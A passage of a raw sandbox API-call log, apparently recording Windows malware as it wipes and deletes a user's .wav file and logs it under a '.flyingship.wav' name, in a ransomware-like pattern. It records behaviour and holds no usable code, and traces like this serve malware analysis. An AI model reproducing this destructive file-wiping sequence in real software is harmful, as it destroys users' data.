lpMsg=0x87ece4) returned 0 [0187.083] FreeLibrary (hLibModule=0x74f20000) returned 1 [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0187.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0187.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.083] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.083] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.084] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.087] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.087] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0187.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0187.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.087] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.087] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.087] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7dbe0c0, ftCreationTime.dwHighDateTime=0x1d5e7f2, ftLastAccessTime.dwLowDateTime=0xd4fff520, ftLastAccessTime.dwHighDateTime=0x1d5d946, ftLastWriteTime.dwLowDateTime=0xd4fff520, ftLastWriteTime.dwHighDateTime=0x1d5d946, nFileSizeHigh=0x0, nFileSizeLow=0x18c81, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ObhGwH4nj0Pk.wav", cAlternateFileName="OBHGWH~1.WAV")) returned 0x90ae18 [0187.088] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0187.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.088] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.088] CharLowerBuffW (in: lpsz="byte[101505]", cchLength=0xc | out: lpsz="byte[101505]") returned 0xc [0187.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.089] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0187.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.089] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.089] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0187.089] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0187.090] FreeLibrary (hLibModule=0x75c90000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0187.091] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.091] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.091] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.091] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0187.091] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.091] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.091] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.091] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.099] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.100] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0187.100] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\obhgwh4nj0pk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0187.100] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.100] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.100] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.100] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0187.100] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.100] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.101] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.101] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.101] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.101] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0187.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.101] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.102] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.102] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.102] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.102] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.102] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav", lpFilePart=0x0) returned 0x59 [0187.102] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7dbe0c0, ftCreationTime.dwHighDateTime=0x1d5e7f2, ftLastAccessTime.dwLowDateTime=0xd4fff520, ftLastAccessTime.dwHighDateTime=0x1d5d946, ftLastWriteTime.dwLowDateTime=0x14bfffc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18c81, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ObhGwH4nj0Pk.wav", cAlternateFileName="OBHGWH~1.WAV")) returned 0x90ae18 [0187.102] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\obhgwh4nj0pk.wav")) returned 1 [0187.104] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7dbe0c0, ftCreationTime.dwHighDateTime=0x1d5e7f2, ftLastAccessTime.dwLowDateTime=0xd4fff520, ftLastAccessTime.dwHighDateTime=0x1d5d946, ftLastWriteTime.dwLowDateTime=0x14bfffc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18c81, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="ObhGwH4nj0Pk.wav", cAlternateFileName="OBHGWH~1.WAV")) returned 0 [0187.104] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.104] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.104] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0187.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0187.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0187.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0187.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0187.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0187.104] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.104] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.105] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.105] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.105] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.105] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0187.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.105] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0187.106] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.106] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0187.106] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.107] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.107] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0187.107] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x26a9, lpOverlapped=0x0) returned 1 [0187.108] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0187.108] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x26a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.108] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0187.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.flyingship.wav\r\n", cchWideChar=103, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 103 [0187.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x67) returned 0x8e8320 [0187.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.flyingship.wav\r\n", cchWideChar=103, lpMultiByteStr=0x8e8320, cbMultiByte=103, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 103 [0187.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0187.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0187.108] WriteFile (in: hFile=0x138, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x66, lpOverlapped=0x0) returned 1 [0187.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0187.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.108] CloseHandle (hObject=0x138) returned 1 [0187.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0187.110] HeapFree (in: 